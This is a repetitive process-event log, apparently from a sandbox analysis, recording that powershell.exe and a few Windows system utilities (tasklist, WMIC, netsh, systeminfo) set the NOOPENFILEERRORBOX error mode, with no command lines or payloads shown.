Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
